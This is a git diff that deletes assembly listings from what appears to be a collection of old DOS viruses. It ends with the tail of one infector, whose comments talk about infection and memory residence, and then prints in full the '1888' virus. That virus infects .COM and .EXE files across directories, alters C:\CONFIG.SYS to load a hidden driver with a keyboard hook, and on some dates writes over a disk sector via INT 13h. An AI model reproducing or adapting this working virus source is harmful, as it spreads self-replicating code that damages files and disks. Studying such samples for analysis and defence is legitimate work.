319BA20h ; Data table (indexed access) - db 0BDh, 20h,0BAh,0BDh, 19h, 02h - db 0BAh, 20h,0BAh,0BDh, 19h, 02h - db 0BAh, 20h,0BAh, 19h, 03h,0BDh - db 20h,0BAh,0BAh, 19h, 04h,0BAh - db 20h, 20h,0BAh,0BAh, 19h, 02h - db 0BAh, 19h, 03h, 01h,0D6h,0C4h - db 0C4h,0C4h,0B7h, 18h,0D3h,0C4h - db 0C4h, 20h,0BAh, 19h, 06h, 08h - db 58h, 19h, 03h,0C7h,0C4h,0B6h - db 19h, 03h,0BAh, 1Ah, 03h,0C4h - db 0BDh, 20h,0BAh, 1Ah, 03h,0C4h - db 0BDh, 20h,0C7h,0C4h,0B6h, 19h - db 03h,0BAh,0B6h, 19h, 04h,0BAh - db 20h, 20h,0BAh,0B6h, 19h, 02h - db 0BAh, 19h, 03h, 01h,0BAh, 20h - db 0C4h,0C4h,0BDh, 18h, 19h, 03h - db 0BAh, 19h, 03h, 08h,0D6h,0C4h - db 0BDh, 19h, 04h,0BAh, 19h, 03h - db 0B7h, 20h,0BAh, 19h, 05h,0BAh - db 19h, 05h,0BAh, 19h, 03h,0B7h - db 20h,0BAh,0D3h, 19h, 02h,0B7h - db 20h,0BAh, 20h, 20h,0BAh,0D3h - db 19h, 02h,0BAh, 19h, 03h, 01h - db 0BAh, 19h, 03h, 18h, 19h, 03h - db 0BAh, 19h, 03h, 08h,0D3h, 1Ah - db 04h,0C4h,0BDh, 20h,0D3h, 1Ah - db 03h,0C4h,0BDh, 20h,0BDh, 19h - db 05h,0BDh, 19h, 05h,0D3h, 1Ah - db 03h,0C4h,0BDh, 20h,0D3h, 1Ah - db 03h,0C4h,0BDh, 20h,0D0h, 20h - db 20h,0D0h, 19h, 03h,0D0h, 19h - db 03h, 01h,0BAh, 19h, 03h, 18h - db 19h, 03h,0C8h, 1Ah, 15h,0CDh - db 0B8h, 19h, 0Ch,0D5h, 1Ah, 16h - db 0CDh,0BCh, 19h, 03h, 18h, 19h - db 1Ah,0D4h,0CDh, 04h, 1Ah, 03h - db 0F7h, 09h, 2Fh, 04h,0EAh, 09h - db 5Ch, 04h, 1Ah, 03h,0F7h, 01h - db 0CDh,0BEh, 19h, 1Bh, 18h - -data_1e equ 0A0h -dot_dot db '..',0 -heap: -; The following code is the buffer for the write function -code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) -oldint24 dd ? ; Storage for old int 24h handler -backslash db ? -origdir db 64 dup (?) ; Current directory buffer -newDTA db 43 dup (?) ; Temporary DTA -numinfec db ? ; Infections this run -buffer db 1ah dup (?) ; read buffer -endheap: ; End of virus -finish label near -end entry_point - - - -; Yeah, the main problem is reproducing the effect in an infected file so -; thta when IT runs, IT too will display... That's the GLITCH... 
-;
-; Also, I had stuck INT 27H in somewhere around the EXIT .EXE...
-; I don't remember, but it would go resident and suck up memory, yet
-; since it hooked no interuppts, it just sat there...
-; Feel free to STUDY this code and distribute it feely for educational
-; purposes, because in spite of the kidding...I don't "hAcK"... for lack
-; of a better word...--->>pAgE<<---
diff --git a/0-9/1888 (7).ASM b/0-9/1888 (7).ASM
deleted file mode 100755
index ccc01a3..0000000
--- a/0-9/1888 (7).ASM
+++ /dev/null
@@ -1,1923 +0,0 @@ - -PAGE 59,132 - -; -; -; 1888 -; -; Created: 28-Jul-92 -; Passes: 5 Analysis Options on: none -; -; - -d_0040_001C_e equ 1Ch -d_0040_004A_e equ 4Ah -d_8B38_0003_e equ 3 ;* -data_0012_e equ 12h -data_0016_e equ 16h -data_00A3_e equ 0A3h -data_00A7_e equ 0A7h -data_00A9_e equ 0A9h -data_00AB_e equ 0ABh -data_00AF_e equ 0AFh -data_00B3_e equ 0B3h -data_00B5_e equ 0B5h -d_9E01_0000_e equ 0 ;* -d_9E01_0002_e equ 2 ;* -d_9E01_0004_e equ 4 ;* -d_9E01_0008_e equ 8 ;* -d_9E01_0014_e equ 14h ;* -d_9E01_0016_e equ 16h ;* - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -1888 proc far - -start: - jmp loc_0767 -data_0103 db 20h -data_0104 dw 86C0h -data_0106 dw 18FCh -data_0108 dw 762h -data_010A dw 0 -data_010C db '1888.COM', 0 - db 00h, 00h, 00h,0A6h -data_0119 dw 25h -data_011B db 1 -data_011C dw 760h -data_011E db 0 -data_011F db 0 -data_0120 dw 762h -data_0122 dw 760h -data_0124 dw 0FFFEh -data_0126 dw 5369h ; Data table (indexed access) -data_0128 dw 5369h -data_012A dw 4C97h -data_012C dd 9E010000h -data_0130 dw 7C8h -data_0132 db 8 -data_0133 db 10h -data_0134 db 0 -data_0135 db 10h - db 0, 0, 0, 0 -data_013A db '\DANGER\1888' - db 20 dup (0) -data_015A db 'C:\', 0 - db '*', 0 - db 'NETWARE', 0 - db 'LMS', 0 - db 'MAUS', 0 - db 'MDB', 0 - db 'DOS', 0 - db 'BASE', 0 - db 'L', 0 -data_0180 dw 160h -data_0182 db 0 -data_0183 db 1 - db 14h, 17h, 6Eh, 00h, 01h,0A9h - db 00h, 01h,0BFh - db 38h -data_018E db 2Ah - db 2Eh, 65h, 78h, 65h, 00h -data_0194 db 2Ah - db 2Eh, 63h, 6Fh, 6Dh, 00h -data_019A db 0 -data_019B db 0 -data_019C db 0 -data_019D db 4 - db 3Fh - db 7 dup (3Fh) - db 43h, 4Fh, 4Dh, 23h, 04h, 00h - db 0F3h, 31h, 0Dh, 4Dh, 18h, 68h - db 20h,0C0h, 86h,0FCh, 18h, 62h - db 07h, 00h, 00h - db '1888.COM' - db 00h, 00h, 00h, 00h,0A6h,0EAh - db 0AAh, 03h, 00h,0CCh,0AAh, 03h - db 60h, 07h, 00h, 40h, 05h, 00h - db 60h, 07h, 00h, 01h,0C8h, 01h - db 19h, 01h, 00h, 00h, 69h, 53h - db 69h, 53h, 61h, 06h, 9Dh, 04h - db 16h, 32h, 21h, 
00h, 7Bh, 1Ah - db 12h, 32h,0ADh, 04h, 69h, 53h - db 12h, 32h,0DEh, 07h - -1888 endp - -; -; SUBROUTINE -; - -sub_01F7 proc near - cmp data_011C,0 - jne loc_0207 ; Jump if not equal - mov ax,760h - mov data_011C,ax - mov data_0120,ax -loc_0207: - mov al,data_011E - mov data_011F,al - mov ax,data_0120 - mov data_0122,ax - inc data_0119 - mov data_019C,0 - mov data_019A,0 - mov data_019B,0 - retn -sub_01F7 endp - - -; -; SUBROUTINE -; - -sub_0227 proc near - lea dx,data_0183 ; Load effective addr - xor al,al ; Zero register - mov ah,3Dh ; '=' - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jc loc_ret_0239 ; Jump if carry Set - mov bx,ax - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - -loc_ret_0239: - retn -sub_0227 endp - - -; -; SUBROUTINE -; - -sub_023A proc near - mov ah,2Ah ; '*' - int 21h ; DOS Services ah=function 2Ah - ; get date, cx=year, dh=month - ; dl=day, al=day-of-week 0=SUN - mov ah,dh - cmp cx,data_0130 - je loc_0249 ; Jump if equal - add ah,0Ch -loc_0249: - sub ah,data_0132 - mov data_011B,ah - mov data_0134,al - mov data_0133,dl - mov data_0132,dh - mov data_0130,cx - mov ah,2Ch ; ',' - int 21h ; DOS Services ah=function 2Ch - ; get time, cx=hrs/min, dx=sec - mov data_0135,ch - retn -sub_023A endp - - -; -; SUBROUTINE -; - -sub_0269 proc near - mov ax,es - dec ax - push es - mov es,ax - mov ax,es:d_8B38_0003_e - mov data_012A,ax - pop es - mov bx,ax - sub bx,200h - mov ah,4Ah ; 'J' - int 21h ; DOS Services ah=function 4Ah - ; change memory allocation - ; bx=bytes/16, es=mem segment - mov bx,150h - mov ah,48h ; 'H' - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov word ptr data_012C+2,ax - retn -sub_0269 endp - - -; -; SUBROUTINE -; - -sub_028C proc near - push es - mov ax,word ptr data_012C+2 - mov es,ax - mov ah,49h ; 'I' - int 21h ; DOS Services ah=function 49h - ; release memory block, es=seg - mov ax,data_0128 - mov es,ax - mov bx,data_012A - 
mov ah,4Ah ; 'J' - int 21h ; DOS Services ah=function 4Ah - ; change memory allocation - ; bx=bytes/16, es=mem segment - pop es - retn -sub_028C endp - - -; -; SUBROUTINE -; - -sub_02A5 proc near - push ds - mov ah,1Bh - int 21h ; DOS Services ah=function 1Bh - ; get disk info, default drive - ; al=sectors per cluster - ; ds:bx=ptr to media ID byte - ; cx=sector size, dx=clusters - cmp byte ptr [bx],0F8h - pop ds - retn -sub_02A5 endp - - -; -; SUBROUTINE -; - -sub_02AF proc near - lea si,data_019D ; Load effective addr - mov di,si - xor dl,dl ; Zero register - mov ah,47h ; 'G' - int 21h ; DOS Services ah=function 47h - ; get present dir,drive dl,1=a: - ; ds:si=ASCIIZ directory name - mov cx,30h - mov al,0 - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - mov cx,di - sub cx,si - lea di,data_013A ; ('\DANGER\1888') Load effective addr - mov al,5Ch ; '\' - stosb ; Store al to es:[di] - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - retn -sub_02AF endp - - -; -; SUBROUTINE -; - -sub_02D0 proc near - mov data_0182,0 - lea bx,cs:[160h] ; Load effective addr - add bx,20h - mov data_0180,bx - sub bx,20h - lea dx,data_015A+4 ; ('*') Load effective addr - mov cx,33h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jc loc_031F ; Jump if carry Set -loc_02F0: - lea di,data_019D ; Load effective addr - add di,1Eh - cmp byte ptr [di],2Eh ; '.' 
- je loc_0319 ; Jump if equal - mov si,di - mov cx,20h - mov al,0 - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - mov cx,di - sub cx,si - mov di,bx - add bx,cx - cmp bx,data_0180 - ja loc_031F ; Jump if above - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - inc data_0182 -loc_0319: - mov ah,4Fh ; 'O' - int 21h ; DOS Services ah=function 4Fh - ; find next filename match - jnc loc_02F0 ; Jump if carry=0 -loc_031F: - lea bx,cs:[160h] ; Load effective addr - mov data_0180,bx - retn -sub_02D0 endp - - -; -; SUBROUTINE -; - -sub_0328 proc near - cmp data_0182,0 - je loc_ret_034C ; Jump if equal - lea dx,data_013A ; ('\DANGER\1888') Load effective addr - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - mov dx,data_0180 - mov di,dx - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - mov al,0 - mov cx,20h - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - mov data_0180,di - -loc_ret_034C: - retn -sub_0328 endp - - -; -; SUBROUTINE -; - -sub_034D proc near - mov ax,data_0104 - and al,1Fh - cmp al,1Eh - retn -sub_034D endp - - -; -; SUBROUTINE -; - -sub_0355 proc near - lea dx,data_0194 ; Load effective addr - cmp data_011E,0 - je loc_0364 ; Jump if equal - lea dx,data_018E ; Load effective addr -loc_0364: - mov cx,23h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - retn -sub_0355 endp - - -; -; SUBROUTINE -; - -sub_036C proc near - lea si,data_019D ; Load effective addr - add si,15h - lea di,data_0103 ; Load effective addr - mov cx,16h - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - retn -sub_036C endp - - -; -; SUBROUTINE -; - -sub_037D proc near - pushf ; Push flags - mov cx,data_0104 - or cl,1Fh - and cl,0FEh - mov dx,data_0106 - mov ax,5701h - int 21h ; DOS Services ah=function 57h - ; set file date+time, bx=handle - ; cx=time, dx=time - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle 
- lea dx,data_010C ; ('1888.COM') Load effective addr - xor ch,ch ; Zero register - mov cl,data_0103 - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - popf ; Pop flags - retn -sub_037D endp - - -; -; SUBROUTINE -; - -sub_03A6 proc near - lea dx,data_010C ; ('1888.COM') Load effective addr - xor cx,cx ; Zero register - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - jc loc_ret_03BA ; Jump if carry Set - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - mov bx,ax - -loc_ret_03BA: - retn -sub_03A6 endp - - -; -; SUBROUTINE -; - -sub_03BB proc near - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - mov cx,100h - xor dx,dx ; Zero register - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - cmp word ptr ds:d_9E01_0000_e,5A4Dh - nop ;*ASM fixup - sign extn byte - je loc_03D6 ; Jump if equal - stc ; Set carry flag - jmp loc_0455 -loc_03D6: - call sub_0457 - push ax - mov ax,di - and ax,0Fh - mov cx,10h - xor dx,dx ; Zero register - sub cx,ax - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - jnc loc_03EF ; Jump if carry=0 - jmp short loc_0455 - db 90h -loc_03EF: - mov si,ax - mov cx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - jc loc_0455 ; Jump if carry Set - pop dx - mov ax,di - add ax,si - add ax,100h - cmp ax,200h - jb loc_040B ; Jump if below - and ax,1FFh - inc dx -loc_040B: - mov cl,4 - shr ax,cl ; Shift w/zeros fill - dec dx - mov cl,5 - shl dx,cl ; Shift w/zeros fill - sub dx,ds:d_9E01_0008_e - add ax,dx - sub ax,10h - mov ds:d_9E01_0016_e,ax - mov word ptr ds:d_9E01_0014_e,100h - push ds - mov ax,cs - mov ds,ax - mov cx,data_011C - mov dx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file 
bx=file handle - ; cx=bytes from ds:dx buffer - pop ds - jc loc_0455 ; Jump if carry Set - call sub_0457 - mov ds:d_9E01_0002_e,di - mov ds:d_9E01_0004_e,ax - mov ax,4200h - xor dx,dx ; Zero register - xor cx,cx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_0455 ; Jump if carry Set - mov cx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer -loc_0455: - pop ds - retn -sub_03BB endp - - -; -; SUBROUTINE -; - -sub_0457 proc near - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov di,ax - and di,1FFh - mov cl,9 - shr ax,cl ; Shift w/zeros fill - mov cl,7 - shl dx,cl ; Shift w/zeros fill - add ax,dx - inc ax - retn -sub_0457 endp - - -; -; SUBROUTINE -; - -sub_0472 proc near - mov ax,data_0108 - mov data_0120,ax - mov cx,data_011C - cmp cx,ax - jb loc_0488 ; Jump if below - mov data_0120,cx - mov cx,data_0108 -loc_0488: - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - xor dx,dx ; Zero register - mov ah,3Fh ; '?' 
- int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - pop ds - jc loc_ret_04DD ; Jump if carry Set - mov ax,4200h - xor dx,dx ; Zero register - xor cx,cx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_ret_04DD ; Jump if carry Set - mov dx,100h - mov cx,data_011C - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - int 3 ; Debug breakpoint - cmp ax,cs:data_0108 - ja loc_04CC ; Jump if above - mov ax,4200h - mov dx,data_0108 - mov data_0120,dx - xor cx,cx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_ret_04DD ; Jump if carry Set - mov cx,data_011C - jmp short loc_04D0 -loc_04CC: - mov cx,data_0108 -loc_04D0: - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - xor dx,dx ; Zero register - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - pop ds - -loc_ret_04DD: - retn -sub_0472 endp - - -; -; SUBROUTINE -; - -sub_04DE proc near - cmp data_011B,2 - ja loc_04E8 ; Jump if above - xor ax,ax ; Zero register - retn -loc_04E8: - mov al,data_0133 - and al,1 - retn -sub_04DE endp - - -; -; SUBROUTINE -; - -sub_04EE proc near - cmp data_0133,0Fh - jb loc_0507 ; Jump if below - mov al,data_0135 - cmp al,13h - jb loc_0507 ; Jump if below - mov ax,40h - mov es,ax - mov byte ptr es:d_0040_004A_e,23h ; '#' -loc_0507: - cmp data_0133,0Dh - jne loc_ret_0524 ; Jump if not equal - cmp data_0134,5 - jne loc_ret_0524 ; Jump if not equal - mov ax,301h - mov cx,1 - mov dx,50h - xor bx,bx ; Zero register - mov es,bx - int 13h ; Disk dl=drive ? 
ah=func 03h - ; write sectors from mem es:bx - ; al=#,ch=cyl,cl=sectr,dh=head - -loc_ret_0524: - retn -sub_04EE endp - - -; -; SUBROUTINE -; - -sub_0525 proc near - mov data_019B,1 - lea dx,data_05C1 ; Load effective addr - mov cx,27h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jnc loc_0564 ; Jump if carry=0 - mov ah,3Ch ; '<' - mov cx,6 - int 21h ; DOS Services ah=function 3Ch - ; create/truncate file @ ds:dx - mov bx,ax - lea dx,data_05EE ; Load effective addr - mov cx,data_070A - mov si,dx - add si,data_00B3_e - mov ax,data_0130 - mov [si],ax - mov ah,data_0132 - mov [si+2],ah - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - jc loc_05BD ; Jump if carry Set -loc_0564: - lea dx,data_05C7 ; Load effective addr - mov cx,27h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jc loc_05BD ; Jump if carry Set - call sub_036C - xor cx,cx ; Zero register - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - mov bx,ax - jc loc_05BD ; Jump if carry Set - mov cx,data_0108 - push es - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - mov es,ax - xor dx,dx ; Zero register - mov ah,3Fh ; '?' 
- int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - pop ds - mov dx,ax - mov ax,0FFFFh - xor di,di ; Zero register - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - cmp ax,es:[di-1] - pop es - jz loc_05BD ; Jump if zero - mov ax,4200h - xor cx,cx ; Zero register - dec dx - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_05BD ; Jump if carry Set - lea dx,data_05D5 ; Load effective addr - mov cx,19h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer -loc_05BD: - call sub_037D - retn -sub_0525 endp - -data_05C1 db 43h - db 3Ah, 5Ch,0FFh,0FFh, 00h -data_05C7 db 'C:\CONFIG.SYS', 0 -data_05D5 db 'DEVICE =' - db 0FFh,0FFh - db ' COUNTRY.SYS', 0Dh, 0Ah - db 1Ah -data_05EE db 0FFh - db 0FFh,0FFh,0FFh, 40h,0C8h, 16h - db 00h, 21h, 00h - db 'hgt42 ' - db 00h, 00h, 00h, 00h, 2Eh, 89h - db 1Eh, 12h, 00h, 2Eh, 8Ch, 06h - db 14h, 00h,0CBh, 1Eh, 06h, 0Eh - db 1Fh,0C4h, 3Eh, 12h, 00h, 26h - db 8Ah, 45h, 02h, 3Ch, 00h, 75h - db 03h,0E8h, 82h, 00h - db 0Dh, 00h, 10h, 26h, 89h, 45h - db 03h, 07h, 1Fh,0CBh, 50h, 53h - db 51h, 1Eh - db 0E4h, 60h,0A8h, 80h, 75h, 30h - db 2Eh, 8Bh, 1Eh,0A9h, 00h, 3Ah - db 0C7h, 75h, 27h,0B8h, 40h, 00h - db 8Eh,0D8h,0E8h, 28h, 00h, 25h - db 05h, 00h, 8Bh,0C8h - db 0BBh, 1Ch, 00h - -locloop_064F: - mov ax,cs:data_00A9_e - mov [bx],ax - add bx,2 - cmp bx,3Fh - jb loc_0660 ; Jump if below - mov bx,1Eh -loc_0660: - mov word ptr ds:[1Ch],bx - loop locloop_064F ; Loop if cx > 0 - -loc_0666: - pop ds - pop cx - pop bx - pop ax - jmp dword ptr cs:data_00A3_e - -; -; SUBROUTINE -; - -sub_066F proc near - mov ax,cs:data_00A7_e - push ax - and ah,0B4h - pop ax - jp loc_067B ; Jump if parity=1 - stc ; Set carry flag -loc_067B: - rcl ax,1 ; Rotate thru carry - mov cs:data_00A7_e,ax - retn -sub_066F endp - - db 'hgt42 ' - db 00h, 56h, 31h, 00h, 46h, 52h - db 44h, 00h, 00h, 00h, 00h, 00h - 
db 00h, 65h, 12h, 65h, 73h, 74h - db 6Eh, 12h, 1Fh, 14h, 31h,0CDh - db 0ABh,0EFh - db 06h, 57h,0B4h, 2Ah,0CDh, 21h - db 8Ah,0E6h, 3Bh, 0Eh,0B3h, 00h - db 74h, 03h, 80h,0C4h - db 0Ch -loc_06B5: - sub ah,ds:data_00B5_e - cmp ah,3 - jb loc_06FB ; Jump if below - mov ds:data_00B5_e,dh - mov ds:data_00B3_e,cx - mov ah,2Ch ; ',' - int 21h ; DOS Services ah=function 2Ch - ; get time, cx=hrs/min, dx=sec - mov ds:data_00A7_e,dx - call sub_066F - mov bx,ax - and bx,3 - nop ;*ASM fixup - sign extn byte - mov al,ds:data_00AB_e[bx] - mov ah,ds:data_00AF_e[bx] - mov ds:data_00A9_e,ax - mov ax,3516h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov ds:data_00A3_e,bx - mov bx,es - mov word ptr ds:data_00A3_e+2,bx - cli ; Disable interrupts -;* mov dx,offset loc_003E ;* - db 0BAh, 3Eh, 00h - mov ax,2516h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - sti ; Enable interrupts -loc_06FB: - pop di - pop es - mov word ptr es:[di+0Eh],0B6h - mov es:[di+10h],cs - xor ax,ax ; Zero register - retn -data_070A dw 11Ch -data_070C db 8Bh - db 1Eh, 28h, 01h,0A1h, 26h, 01h - db 8Eh,0D0h, 8Bh, 26h, 24h, 01h - dw 0EC83h, 8B04h - dw 80F4h, 1F3Eh - dw 1, 2875h - dw 0BFh, 3601h - dw 3C89h, 0FB8Bh - dw 8936h, 27Ch - dw 0FF33h, 8936h - dw 47Ch, 0BFh - dw 8B01h, 2236h - dw 301h, 8BF7h - dw 1C0Eh, 8C01h - dw 8ED8h, 0F3C0h - dw 0EBA4h, 9016h - db 8Bh,0FBh, 83h,0C7h, 10h,0A1h - db 16h, 00h, 03h,0F8h, 36h, 89h - db 7Ch, 02h, 8Bh, 3Eh, 14h, 00h - db 36h, 89h - db 3Ch - db 8Eh,0DBh, 8Eh,0C3h,0CBh -loc_0767: - mov ax,ss - mov cs:data_0126,ax - mov cs:data_0124,sp - mov ax,cs - mov ss,ax - mov sp,1F7h - push ds - mov ds,ax - pop ax - mov data_0128,ax - call sub_0269 - mov ax,cs - mov es,ax - call sub_01F7 - mov dx,offset data_019D - mov ah,1Ah - int 21h ; DOS Services ah=function 1Ah - ; set DTA(disk xfer area) ds:dx - call sub_02AF - call sub_02A5 - jnc loc_079C ; Jump if carry=0 - jmp loc_083A -loc_079C: - call sub_0227 - jc loc_07A4 ; Jump if carry 
Set - jmp loc_083A -loc_07A4: - call sub_023A - call sub_02D0 - mov data_011E,0 -loc_07AF: - call sub_0355 - jc loc_0800 ; Jump if carry Set -loc_07B4: - cmp data_019C,4 - ja loc_083A ; Jump if above - call sub_036C - call sub_034D - jnc loc_07FA ; Jump if carry=0 - cmp data_010A,4 - ja loc_07FA ; Jump if above - call sub_03A6 - jc loc_083A ; Jump if carry Set - cmp data_011E,0 - je loc_07DB ; Jump if equal - call sub_03BB - jmp short loc_07DE -loc_07DB: - call sub_0472 -loc_07DE: - call sub_037D - jc loc_083A ; Jump if carry Set - inc data_019C - cmp data_019B,1 - je loc_07FA ; Jump if equal - call sub_04DE - jz loc_07FA ; Jump if zero - call sub_0525 - jc loc_083A ; Jump if carry Set - jmp short loc_07AF -loc_07FA: - mov ah,4Fh ; 'O' - int 21h ; DOS Services ah=function 4Fh - ; find next filename match - jnc loc_07B4 ; Jump if carry=0 -loc_0800: - cmp data_011E,1 - je loc_080E ; Jump if equal - mov data_011E,1 - jmp short loc_07AF -loc_080E: - mov data_011E,0 - cmp data_019A,0 - jne loc_0829 ; Jump if not equal - lea dx,data_015A ; ('C:\') Load effective addr - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - mov data_019A,0FFh - jmp short loc_07AF -loc_0829: - cmp data_0182,0 - je loc_083A ; Jump if equal - call sub_0328 - dec data_0182 - jmp loc_07AF -loc_083A: - lea dx,data_013A ; ('\DANGER\1888') Load effective addr - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - call sub_04DE - jz loc_084A ; Jump if zero - call sub_04EE -loc_084A: - mov ax,word ptr data_012C+2 - mov es,ax - mov cx,5Bh - mov si,offset data_070C - xor di,di ; Zero register - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - call sub_028C - call data_012C - int 20h ; DOS program terminate - db 0E9h, 64h, 06h, 20h,0A4h, 86h - db 0FCh, 18h, 02h, 00h, 00h, 00h - db 31h, 2Eh, 43h, 4Fh, 4Dh, 00h - db 20h, 20h, 4Dh, 00h, 00h, 00h - db 0A6h, 24h, 00h, 00h, 60h, 07h - db 00h, 00h, 60h, 07h, 60h, 07h - db 
0FEh,0FFh, 6Ch, 0Dh, 6Ch, 0Dh - db 94h, 92h, 00h, 00h, 01h, 9Eh - db 0C8h, 07h, 07h, 1Ch, 02h, 10h - db 00h, 00h, 00h, 00h, 5Ch, 00h - db 4Fh, 53h, 53h, 49h, 00h, 45h - db 4Eh, 00h - db 53h, 54h - db 20 dup (0) - db 'C:\', 0 - db '*', 0 - db 'NETWARE', 0 - db 'LMS', 0 - db 'MAUS', 0 - db 'MDB', 0 - db 'DOS', 0 - db 'BASE', 0 - db 'L', 0 - db '`' - db 01h, 00h, 01h, 14h, 17h, 6Eh - db 00h, 01h,0A9h, 00h, 01h,0BFh - db 38h, 2Ah, 2Eh, 65h, 78h, 65h - db 00h, 2Ah, 2Eh, 63h, 6Fh, 6Dh - db 00h, 00h, 00h, 04h, 01h - db 3Fh - db 7 dup (3Fh) - db 43h, 4Fh, 4Dh, 23h, 0Ah, 00h - db 00h, 00h, 31h,0C0h, 50h, 9Ah - db 20h,0A4h, 86h,0FCh, 18h, 02h - db 00h, 00h, 00h, 31h, 2Eh, 43h - db 4Fh, 4Dh, 00h, 20h, 20h, 4Dh - db 00h, 00h, 00h,0A6h,0EAh,0AAh - db 03h, 00h,0CCh,0AAh, 03h, 00h - db 00h, 31h, 31h, 00h, 40h, 48h - db 07h, 00h, 40h, 6Ch, 15h, 6Ch - db 15h, 00h, 40h, 05h, 00h, 60h - db 07h, 00h, 01h,0C8h, 01h, 19h - db 01h, 82h, 08h, 6Ch, 0Dh, 6Ch - db 0Dh,0ADh, 04h, 6Ch, 0Dh, 46h - db 72h,0DEh, 07h - -; -; SUBROUTINE -; - -sub_0959 proc near - cmp data_011C,0 - jne loc_0969 ; Jump if not equal - mov ax,760h - mov data_011C,ax - mov data_0120,ax -loc_0969: - mov al,data_011E - mov data_011F,al - mov ax,data_0120 - mov data_0122,ax - inc data_0119 - mov data_019C,0 - mov data_019A,0 - mov data_019B,0 - retn -sub_0959 endp - - -; -; SUBROUTINE -; - -sub_0989 proc near - lea dx,data_0183 ; Load effective addr - xor al,al ; Zero register - mov ah,3Dh ; '=' - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jc loc_ret_099B ; Jump if carry Set - mov bx,ax - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - -loc_ret_099B: - retn -sub_0989 endp - - -; -; SUBROUTINE -; - -sub_099C proc near - mov ah,2Ah ; '*' - int 21h ; DOS Services ah=function 2Ah - ; get date, cx=year, dh=month - ; dl=day, al=day-of-week 0=SUN - mov ah,dh - cmp cx,data_0130 - je loc_09AB ; Jump if equal - add ah,0Ch -loc_09AB: - sub ah,data_0132 - mov 
